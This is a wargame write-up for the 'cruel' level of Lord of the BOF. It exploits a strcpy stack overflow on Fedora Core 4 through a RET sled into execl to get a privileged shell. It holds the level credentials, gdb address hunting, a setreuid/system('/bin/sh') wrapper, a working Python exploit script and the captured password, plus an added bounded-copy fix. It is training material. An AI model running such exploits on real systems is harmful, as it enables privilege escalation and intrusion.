
ID | dark_stone

PW | let there be light

Log in with the credentials above.



Use

$ ls -l

to check which files and directories are there, and

$ cat [problem name].c

to view the source code.




/*
    The Lord of the BOF : The Fellowship of the BOF 
    - cruel
    - Local BOF on Fedora Core 4
    - hint : no more fake ebp, RET sleding on random library
*/
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
 
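The bug in cruel.c is the unbounded strcpy of argv[1] into a 256-byte stack buffer: any argument longer than the buffer overwrites the saved frame pointer and the return address, which is exactly what the 260 bytes of 'A' plus return addresses in the rest of this writeup rely on. Below is an added example, not from the original post or the LOB level itself, showing the same program with the copy bounded so over-long input is rejected instead of written past the buffer. The helper accepts_length() is hypothetical, added only so the check can be exercised with inputs of different sizes without running a separate process.

```c
/* Added example (not part of the original writeup): cruel.c with the
 * argv[1] copy bounded to the buffer size. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 256

/* Length of s, scanning at most `max` bytes so an unterminated or very
 * long input cannot run the scan past what we are willing to accept. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Bounded replacement for strcpy(buffer, argv[1]).
 * Returns 0 and copies src (with its NUL) if it fits in dst_size bytes,
 * otherwise returns -1 and writes nothing. */
int copy_arg_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = bounded_len(src, dst_size);
    if (len >= dst_size)          /* no room left for the terminating NUL */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Hypothetical test helper: builds a constructed argument of `len` 'A'
 * bytes and reports 1 if the bounded copy accepts it, 0 if it rejects it,
 * -1 on allocation failure. */
int accepts_length(size_t len)
{
    char buffer[BUF_SIZE];
    char *src = malloc(len + 1);
    int rc;

    if (src == NULL)
        return -1;
    memset(src, 'A', len);
    src[len] = '\0';
    rc = copy_arg_bounded(buffer, sizeof buffer, src);
    free(src);
    return rc == 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }

    /* Original form, kept here only as a comment for comparison:
     *     strcpy(buffer, argv[1]);
     * It copies argv[1] regardless of length, so bytes beyond 256 land on
     * the saved ebp and the return address. */
    if (copy_arg_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

With this change the 260-byte argument used later in the writeup is refused before anything is written to the stack; the 255-byte maximum is the largest string the buffer can hold together with its NUL terminator.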



[dark_stone@Fedora_2ndFloor ~]$ gdb -q cruel

(no debugging symbols found)

Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) b* main+109

Breakpoint 1 at 0x8048451

(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Starting program: /home/dark_stone/cruel AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

(no debugging symbols found)

(no debugging symbols found)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Breakpoint 1, 0x08048451 in main ()

(gdb) x/20x $esp-20

0xbf85c778: 0x41414141 0x41414141 0x41414141 0x41414141

0xbf85c788: 0x41414141 0x007bad00 0x00000002 0xbf85c814

0xbf85c798: 0xbf85c820 0xbf85c7d0 0x00795898 0x007a3878

0xbf85c7a8: 0xb7f5e690 0x00000001 0x008caff4 0x007a2ca0

0xbf85c7b8: 0x08048454 0xbf85c7e8 0xbf85c790 0x007bad44

(gdb) x/2x 0x008caff4

0x8caff4: 0x008cad3c 0x007bab16



0x008caff4 points to 0x008cad3c.

A quick RET sled takes care of it.



0x08048450 <main+108>: leave  

0x08048451 <main+109>: ret    



(gdb) b main

Breakpoint 1 at 0x80483ed

(gdb) r

Starting program: /home/dark_stone/cruel 

(no debugging symbols found)

(no debugging symbols found)


Breakpoint 1, 0x080483ed in main ()

(gdb) p execl

$1 = {<text variable, no debug info>} 0x832d68 <execl>




#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setreuid, setregid, geteuid, getegid */

int main(void)
{
        setreuid(geteuid(),geteuid());
        setregid(getegid(),getegid());
        system("/bin/sh");
}

[dark_stone@Fedora_2ndFloor ~]$ gcc -o `python -c 'print "\x3c\xad\x8c\x00"'` ex.c


import os
import struct
 
 
p32 = lambda x: struct.pack("<I", x)
 
target = "/home/dark_stone/cruel"
 
ret = 0x8048451
execl = 0x832d68
 
payload = 'A' * 260
 
payload += p32(ret) * 7
payload += p32(execl)
 
os.execv(target, (target, payload[:-1]))
 


[dark_stone@Fedora_2ndFloor ~]$ vi ex.py

[dark_stone@Fedora_2ndFloor ~]$ python ex.

python: can't open file 'ex.': [Errno 2] No such file or directory

[dark_stone@Fedora_2ndFloor ~]$ python ex.py

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ�Q�Q�Q�Q�Q�Q�h-�

sh-3.00$ my-pass

euid = 501

come on, come over

